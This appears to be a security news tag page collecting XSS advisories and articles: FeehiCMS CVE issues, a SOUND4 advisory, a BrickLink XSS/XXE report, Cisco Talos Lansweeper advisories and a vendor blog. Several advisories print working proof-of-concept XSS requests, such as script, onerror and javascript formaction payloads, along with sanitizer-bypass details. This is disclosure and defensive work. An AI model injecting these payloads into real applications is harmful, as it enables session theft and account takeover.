Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.1.1 allows remote attackers to run arbitrary code via upload of crafted XML file.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-40373: Unauthorized upload of XML file to execute XSS · Issue #67 · liufee/cms

Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbirtary code via the callback parameter to /cms/notify.

CVE-2022-40002: Cross Site Scripting Vulnerability On Feehi CMS · Issue #66 · liufee/cms

Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the title field of the create article page.

CVE-2022-40001: Cross Site Scripting Vulnerability On Feehi CMS · Issue #65 · liufee/cms

Cross Site Scripting (XSS) vulnerability in FeehiCMS-2.1.1 allows remote attackers to run arbitrary code via the username field of the admin log in page.

CVE-2022-40000: Cross Site Scripting Vulnerability On Feehi CMS · Issue #64 · liufee/cms

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username persistent cross site scripting vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Stored Cross-Site ScriptingVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated stored XSS vulnerabilitythat results in stored JS code and authentication bypass. The issue is triggeredwhen input passed to the 'username' parameter is not properly sanitized beforebeing returned to the user. This can be exploited to execute arbitrary HTMLand script code in a user's browser session in context of an affected site.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5731Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5731.php26.09.2022--POST /index.php HTTP/1.1username="><script>confirm(251)</script>&password=zeroscience"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Persistent Cross Site Scripting

Attackers also could breach internal production data to compromise a corporate network using vulnerabilities found in the BrickLink online platform.

API flaws in a widely used Lego online marketplace could have allowed attackers to take over user accounts, leak sensitive data stored on the platform, and even gain access to internal production data to compromise corporate services, researchers have found.

Researchers from Salt Labs discovered the vulnerabilities in BrickLink, a digital resale platform owned by the Lego Group for buying and selling second-hand Legos, demonstrating that — technology-wise, anyway — not all of the company's toy pieces snap perfectly into place.

Salt Security's research arm discovered both vulnerabilities by investigating areas of the site that support user input fields, Shiran Yodev, Salts Labs security researcher, revealed in a report published on Dec. 15.

The researchers found each of the core flaws that could be exploited for attack in parts of the site that allow for user input, which they said is often a place where API security issues — a complex and costly problem for organizations — arise.

One flaw was a cross-site scripting (XSS) vulnerability that enabled them to inject and execute code on a victim end user’s machine through a crafted link, they said. The other allowed for the execution of an XML External Entity (XXE) injection attack, where an XML input containing a reference to an external entity is processed by a weakly configured XML parser.

**API Weaknesses Abound**

The researchers were careful to stress that they didn't intend to single out Lego as a particularly negligent technology provider — on the contrary, API flaws in Internet-facing applications are incredibly common, they said.

There is a key reason for that, Yodev tells Dark Reading**:** No matter the competency of an IT design and development team, API security is a new discipline that all Web developers and designers are still figuring out.

"We readily find these kinds of serious API vulnerabilities in all sorts of online services we investigate," he says. "Even companies with the most robust application security tooling and advanced security teams frequently have gaps in their API business logic."

And while both flaws could have been discovered easily through pre-production security testing, "API security is still an afterthought for many organizations," notes Scott Gerlach, co-founder and CSO at StackHawk, an API security testing provider.

"It usually doesn't come into play until after an API has already been deployed, or in other cases, organizations are using legacy tooling not built to test APIs thoroughly, leaving vulnerabilities like cross-site scripting and injection attacks undiscovered," he says.

**Personal Interest, Rapid Response**

The research to investigate Lego's BrickLink was not meant to shame and blame Lego or "make anyone look bad," but rather to demonstrate "how common these mistakes are and to educate companies on steps they can take to protect their key data and services," Yodev says.

The Lego Group is the world’s largest toy company and a massively recognizable brand that can indeed draw people's attention to the issue, the researchers said. The company earns billions of dollars in revenue per year, not only because of children's interest in using Legos but also as a result of an entire adult hobbyist community — of which Yodev admits he is one — that also collects and builds Lego sets.

Because of the popularity of Legos, BrickLink has more than 1 million members that use its site.

The researchers discovered the flaws on Oct. 18, and, to its credit, Lego responded quickly when Salt Security revealed the issues to the company on Oct. 23, confirming the disclosure within two days. Tests conducted by Salt Labs confirmed shortly after, on Nov. 10, that the issues had been resolved, the researchers said.

"However, due to Lego's internal policy, they cannot share any information regarding reported vulnerabilities, and we are therefore unable to positively confirm," Yodev acknowledges. Moreover, this policy also prevents Salt Labs from confirming or denying if attackers exploited either of the flaws in the wild, he says.

**Snapping Together the Vulnerabilities**

Researchers found the XSS flaw in the “Find Username” dialog box of BrickLinks' coupon search functionality, leading to an attack chain using a session ID exposed on a different page, they said.

"In the 'Find Username' dialog box, a user can write a free text that eventually ends up rendered into the webpage’s HTML," Yodev wrote. "Users can abuse this open field to input text that can lead to an XSS condition."

Though the researchers couldn't use the flaw on its own to mount an attack, they found an exposed session ID on a different page that they could combine with the XSS flaw to hijack a user's session and achieve account takeover (ATO), they explained.

"Bad actors could have used these tactics for full account takeover or to steal sensitive user data," Yodev wrote.

Researchers uncovered the second flaw in another part of the platform that receives direct user input, called "Upload to Wanted List," which allows BrickLink users to upload a list of wanted Lego parts and/or sets in XML format, they said.

The vulnerability was present due to how the site's XML parser uses XML External Entities, a part of the XML standard that defines a concept called an entity, or a storage unit of some type, Yodev explained in the post. In the case of the BrickLinks page, the implementation was vulnerable to a condition in which the XML processor may disclose confidential information that's typically not accessible by the application, he wrote.

Researchers exploited the flaw to mount an XXE injection attack that allows a system-file read with the permissions of the running user. This type of attack also can allow for an additional attack vector using server-side request forgery, which might enable an attacker to gain credentials for an application running on Amazon Web Services and thus breach an internal network, the researchers said.

**Avoiding Similar API Flaws**

Researchers shared some advice to help enterprises avoid creating similar API issues that can be exploited on Internet-facing applications in their own environments.

In the case of API vulnerabilities, attackers can inflict the most damage if they combine attacks on various issues or conduct them in quick succession, Yodev wrote, something the researchers demonstrated is the case with the Lego flaws.

To avoid the scenario created with the XSS flaw, organizations should follow the rule of thumb "to never trust user input," Yodev wrote. "Input should be properly sanitized and escaped," he added, referring organizations to the XSS Prevention Cheat Sheet by the Open Web Application Security Project (OWASP) for more information on this topic.

Organizations also should be careful in their implementation of session ID on Web-facing sites because it's "a common target for hackers," who can leverage it for session hijacking and account takeover, Yodev wrote.

"It is important to be very careful when handling it and not expose or misuse it for other purposes," he explained.

Finally, the easiest way to stop XXE injection attacks like the one researchers demonstrated is to completely disable External Entities in your XML parser’s configuration, the researchers said. The OWASP has another useful resource called the XXE Prevention Cheat Sheet that can guide organizations in this task, they added.

API Flaws in Lego Marketplace Put User Accounts, Data at Risk

A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable stored xss vulnerability is related with an action: Configuration -> News page->Alter language data choose any language other than english. Vulnerable code is located inside the \LS\CF\HdConfigActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	int newsID = int.Parse(current.Request["id"]);
    Line 2 	string reqType = current.Request["type"];
    Line 3 	(...)
    Line 4 		case "news":		
    Line 5 			delteSQL  = "DELETE FROM htblnewsLang WHERE newsid = @p1";
    Line 6 			insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";		
    Line 7 			break;
    Line 8 		(...)
    Line 9 		DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
    Line 10		foreach (Language langID in Enum.GetValues(typeof(Language)))
    Line 11		{
    Line 12			if (langID != Language.Eng)
    Line 13			{
    Line 14				DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
    Line 15			}
    Line 16		}
    

where part of the request looks like this : REQUEST

    POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
    (...)
    POST DATA:
    lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>	
    

During the news alter operation, there is a special insert sql query for languages other than english line 12. As you might notice, none of the passed news parameters is sanitized before insertion to the database:

    description  - lang24=xss_entry
    news tesxt   - lang24x=<img src=1 onerror=alert(1)>
    

There is an attempt at sanitization made for paramter 5, but news insert query has just 4 values. News text does not seem to be sanitize during output either. Injected code will be automatically triggered each time when a user attempts to edit this news.

**Exploit Proof of Concept**

REQUEST

    POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: */*
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 837
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/configuration/MainPage/
    Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5 0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    
    __VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Fri, 03 Jun 2022 09:01:34 GMT
    Connection: close
    Content-Length: 167
    
    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["eng_new","",""]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-28703: TALOS-2022-1532 || Cisco Talos Intelligence Group

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-184 - Incomplete Blacklist

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

Lansweeper developers allow users to use certain html tags together with chosen attributes in content added/created by users, e.g. News, Ticket text, etc. To avoid malicious XSS attacks, data which might contain such code is sanitized before being added to the page content. We can see such a sanitization example in the widget responsible for News presentation:

    Line 1 	\App_Web_2mmqsorv\ASP\widgets_helpdesknews_aspx.cs
    Line 2 			
    Line 3 			Dictionary<int, News> dictionary = (from row in NewsController.GetClonedCachedNews().AsEnumerable()
    Line 4 				where row.value.Enabled
    Line 5 				select row).ToDictionary((KeyValuePair<int, News> row) => row.Key, (KeyValuePair<int, News> row) => row.Value);
    Line 6 			if (dictionary.Values.Count > 0)
    Line 7 			{
    Line 8 				__w.Write("\r\n        <div id=\"news\" style=\"overflow: auto; line-height: normal;\">\r\n            <div>\r\n                <table>\r\n                    <tbody>\r\n                        ");
    Line 9 				foreach (News objNews in dictionary.objNewss)
    Line 10				{
    Line 11					__w.Write("\r\n                                <tr>\r\n                                    <td valign=\"top\">\r\n                                        ");
    Line 12					if (objNews.Type != 5)
    Line 13					{
    Line 14						__w.Write("\r\n                                            <img alt=\"\" src=\"");
    Line 15						__w.Write(General.PathPrefix());
    Line 16						__w.Write("images/p");
    Line 17						__w.Write(HttpUtility.HtmlEncode(objNews.Type));
    Line 18						__w.Write(".png\"/>\r\n                                        ");
    Line 19					}
    Line 20					__w.Write("\r\n                                    </td>\r\n                                    <td width=\"100%\">");
    Line 21					__w.Write(HtmlSanitizer.SanitizeHtml(objNews.GetTextTranslation(LS.User.Current().Lang)));
    Line 22					__w.Write("</td>\r\n                                </tr>\r\n                        ");
    Line 23				}
    Line 24				__w.Write("\r\n                    </tbody>\r\n                </table>\r\n            </div>\r\n        </div>  \r\n    ");
    Line 25			}
    

as we can see in line 21 before news text is written to the page content, it’s being sanitized by HtmlSanitizer.SanitizeHtml method. Let us take a look at HtmlSanitizer class implementation:

    Line 1 	LS\Extensions\HtmlSanitizer\HtmlSanitizer.cs
    Line 2 	(...)
    Line 3 			public static HtmlSanitizer CustomHtmlSanitizer()
    Line 4 			{
    Line 5 				HtmlSanitizer htmlSanitizer = new HtmlSanitizer();
    Line 6 				string text = "width height style align valign";
    Line 7 				string[] array = new string[58]
    Line 8 				{
    Line 9 					"h1", "h2", "h3", "h3", "h4", "h5", "h6", "strong", "b", "i",
    Line 10					"em", "thead", "tbody", "tr", "br", "p", "div", "span", "ul", "u",
    Line 11					"pre", "sub", "sup", "strike", "hr", "center", "dl", "dt", "dd", "abbr",
    Line 12					"address", "article", "aside", "bdi", "canvas", "caption", "cite", "code", "col", "colgroup",
    Line 13					"datalist", "dfn", "figcaption", "footer", "header", "kbd", "mark", "nav", "noscript", "picture",
    Line 14					"summary", "s", "samp", "section", "small", "tfoot", "var", "wbr"
    Line 15				};
    Line 16				foreach (string tagName in array)
    Line 17				{
    Line 18					htmlSanitizer.Tag(tagName).AllowAttributes(text);
    Line 19				}
    Line 20				htmlSanitizer.Tag("img").AllowAttributes(text + " src title alt crossorigin ismap longdesc usemap");
    Line 21				htmlSanitizer.Tag("table").AllowAttributes(text + " border cellpadding cellspacing rules sortable summary");
    Line 22				htmlSanitizer.Tag("td").AllowAttributes(text + " colspan rowspan headers");
    Line 23				htmlSanitizer.Tag("ol").AllowAttributes(text + " start reversed type");
    Line 24				htmlSanitizer.Tag("font").AllowAttributes(text + " color face size");
    Line 25				htmlSanitizer.Tag("a").AllowAttributes(text + " href dowload hreflang media media_query rel target type").RemoveEmpty();
    Line 26				htmlSanitizer.Tag("video").AllowAttributes(text + " controls autoplay loop muted poster preload src");
    Line 27				htmlSanitizer.Tag("source").AllowAttributes(text + " src type media");
    Line 28				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 29				htmlSanitizer.Tag("area").AllowAttributes(text + " alt coords download href hreflang media rel shape target type");
    Line 30				htmlSanitizer.Tag("audio").AllowAttributes(text + " autoplay controls loop muted preload src");
    Line 31				htmlSanitizer.Tag("bdo").AllowAttributes(text + " dir");
    Line 32				htmlSanitizer.Tag("blockquote").AllowAttributes(text + " cite");
    Line 33				htmlSanitizer.Tag("button").AllowAttributes(text + " autofocus disabled form formaction formenctype formmethod formnovalidate formtarget name type value");
    Line 34				htmlSanitizer.Tag("del").AllowAttributes(text + " cite datetime");
    Line 35				htmlSanitizer.Tag("ins").AllowAttributes(text + " cite datetime");
    Line 36				htmlSanitizer.Tag("details").AllowAttributes(text + " open");
    Line 37				htmlSanitizer.Tag("dialog").AllowAttributes(text + " open");
    Line 38				htmlSanitizer.Tag("label").AllowAttributes(text + " for");
    Line 39				htmlSanitizer.Tag("li").AllowAttributes(text + " value");
    Line 40				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 41				htmlSanitizer.Tag("menu").AllowAttributes(text + " label type");
    Line 42				htmlSanitizer.Tag("menuitem").AllowAttributes(text + " checked command default disabled icon label type");
    Line 43				htmlSanitizer.Tag("q").AllowAttributes(text + " cite");
    Line 44				htmlSanitizer.Tag("th").AllowAttributes(text + " abbr colspan headers rowspan scope sorted");
    Line 45				htmlSanitizer.Tag("time").AllowAttributes(text + " datetime");
    Line 46				htmlSanitizer.Tag("track").AllowAttributes(text + " default kind label src srclang");
    Line 47				htmlSanitizer.RemoveComments = true;
    Line 48				htmlSanitizer.ForbiddenElements.Add("script");
    Line 49				htmlSanitizer.ForbiddenElements.Add("style");
    Line 50				htmlSanitizer.TransformLinks = true;
    Line 51				return htmlSanitizer;
    Line 52			}
    Line 53
    Line 54			public static string SanitizeHtml(string html, params string[] WhiteList)
    Line 55			{
    Line 56				string text = "";
    Line 57				try
    Line 58				{
    Line 59					text = new SimpleHtmlParser().ParseString(html).OuterXml;
    Line 60				}
    Line 61				catch (Exception ex)
    Line 62				{
    Line 63					ErrorLogging.LogToFile(ex, "Parser error");
    Line 64					text = html;
    Line 65				}
    Line 66				text = CustomHtmlSanitizer().Sanitize(text);
    Line 67				HtmlDocument htmlDocument = new HtmlDocument();
    Line 68				htmlDocument.LoadHtml(text);
    Line 69				SanitizeCss(htmlDocument.DocumentNode);
    Line 70				if (htmlDocument.DocumentNode.ChildNodes.Count == 0 || htmlDocument.DocumentNode.ChildNodes.Count > 1)
    Line 71				{
    Line 72					return "<div style=\"font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;\">" + htmlDocument.DocumentNode.InnerHtml.Trim() + "</div>";
    Line 73				}
    Line 74				return htmlDocument.DocumentNode.InnerHtml.Trim();
    Line 75			}
    Line 76	(...)
    

That’s of course just a part of this class, but we can observe more or less what the assumptions are, etc. This class contains a list of allowed html tags and their attributes the user might use in the text. There are also additional checks for particular attributes (for example, for href where developers check whether it does not start with a schema different than “http/https”). Unfortunately developers allow a tag like button with its attribute formaction and do not sanitize it at all. This gives a potential attacker the possibility to inject malicious javascript code, which will be triggered after the user clicks the button.

**Exploit Proof of Concept**

REQUEST POST /configuration/MainPage/MainPageActions.aspx?action=editnews&id=3 HTTP/1.1 Host: 192.168.0.102:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: _/_ Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 438 Origin: http://192.168.0.102:81 Connection: close Referer: http://192.168.0.102:81/configuration/MainPage/ Cookie: UserSettings=language=1; ASP.NET\_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=;

    __VIEWSTATE=&editnewstext=<button style="width: 500px;height:500px" form="formc" formaction="javascript:alert(1)">click me</button>&newsid=3
    

RESPONSE HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/8.0 x-frame-options: SAMEORIGIN X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 09 Jun 2022 10:15:53 GMT Connection: close Content-Length: 150

    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32763: TALOS-2022-1541 || Cisco Talos Intelligence Group

Web applications, often in the form of Software as a Service (SaaS), are now the cornerstone for businesses all over the world. SaaS solutions have revolutionized the way they operate and deliver services, and are essential tools in nearly every industry, from finance and banking to healthcare and education. 
Most startup CTOs have an excellent understanding of how to build highly functional

Web applications, often in the form of Software as a Service (SaaS), are now the cornerstone for businesses all over the world. SaaS solutions have revolutionized the way they operate and deliver services, and are essential tools in nearly every industry, from finance and banking to healthcare and education.

Most startup CTOs have an excellent understanding of how to build highly functional SaaS businesses but (as they are not cyber security professionals) need to gain more knowledge of how to secure the web application that underpins it.

**Why test your web applications?**

If you are a CTO at a SaaS startup, you are probably already aware that just because you are small doesn't mean you're not on the firing line. The size of a startup does not exempt it from cyber-attacks – that's because hackers constantly scan the internet looking for flaws that they can exploit. Additionally, it takes only one weakness, and your customer data could end up on the internet. It takes many years to build a reputation as a startup – and this can be ruined overnight with a single flaw.

According to recent research from Verizon, web application attacks are involved in 26% of all breaches, and app security is a concern for ¾ of enterprises. This a good reminder that you can't afford to ignore web application security if you want to keep your customer data secure.

**For startups as well as enterprises**

Hacking is increasingly automated and indiscriminate, so startups are just as vulnerable to attack as large enterprises. But no matter where you are on your cybersecurity journey, securing your web apps doesn't need to be difficult. It helps to have a bit of background knowledge, so here's our essential guide to kick-start your web app security testing.

**What are the common vulnerabilities?****1 — SQL injection**

Where attackers exploit vulnerabilities to execute malicious code in your database, potentially stealing or dumping all your data and accessing everything else on your internal systems by backdooring the server.

**2 — XSS (cross-site scripting)**

This is where hackers can target the application's users and enable them to carry out attacks such as installing trojans and keyloggers, taking over user accounts, carrying out phishing campaigns, or identity theft, especially when used with social engineering.

**3 — Path traversal**

These allow attackers to read files held on a system, allowing them to read source code, sensitive protected system files, and capture credentials held within configuration files, and can even lead to remote code execution. The impact can range from malware execution to an attacker gaining full control of a compromised machine.

**4 — Broken authentication**

This is an umbrella term for weaknesses in session management and credential management, where attackers masquerade as a user and use hijacked session IDs or stolen login credentials to access user accounts and use their permissions to exploit web app vulnerabilities.

**5 — Security misconfiguration**

These vulnerabilities can include unpatched flaws, expired pages, unprotected files or directories, outdated software, or running software in debug mode.

**How to test for vulnerabilities?**

Web security testing for applications is usually split into two types – vulnerability scanning and penetration testing:

**Vulnerability scanners** are automated tests that identify vulnerabilities in your web applications and their underlying systems. They're designed to uncover a range of weaknesses in your apps – and are useful because you can run them whenever you want, as a safety mechanism behind the frequent changes you have to make in application development.

**Penetration testing**: these manual security tests are more rigorous, as they're essentially a controlled form of hacking. We recommend you run them alongside scanning for more critical applications, especially those undergoing major changes.

**Go further with 'authenticated' scanning**

Much of your attack surface can be hidden behind a login page. Authenticated web application scanning helps you find vulnerabilities that exist behind these login pages. While automated attacks targeting your external systems are highly likely to impact you at some point, a more targeted attack that includes the use of credentials is possible.

If your application allows anyone on the internet to sign up, then you could easily be exposed. What's more, the functionality available to authenticated users is often more powerful and sensitive, which means a vulnerability identified in an authenticated part of an application is likely to have a greater impact.

Intruder's authenticated web app scanner includes a number of key benefits, including ease of use, developer integrations, false positive reduction, and remediation advice.

**How do I get started?**

Web app security is a journey and can't be 'baked-in' retrospectively to your application just before release. Embed testing with a vulnerability scanner throughout your entire development lifecycle to help find and fix problems earlier.

This approach allows you and your developers to deliver clean and safe code, accelerates the development lifecycle, and improves the overall reliability and maintainability of your application.

Intruder performs reviews across your publicly and privately accessible servers, cloud systems, and endpoint devices to keep you fully protected.

But testing earlier and faster is nearly impossible without automation. Intruder's automated web application scanner is available to try for free before you buy. Sign up to a free trial today and experience it firsthand.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Top 5 Web App Vulnerabilities and How to Find Them

The Permalink Manager Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including 2.2.20.3 due to improper output escaping on post/page/media titles. This makes it possible for attackers to inject arbitrary web scripts on the permalink-manager page if another plugin or theme is installed on the site that allows lower privileged users with unfiltered_html the ability to modify post/page titles with malicious web scripts.

Tag

#xss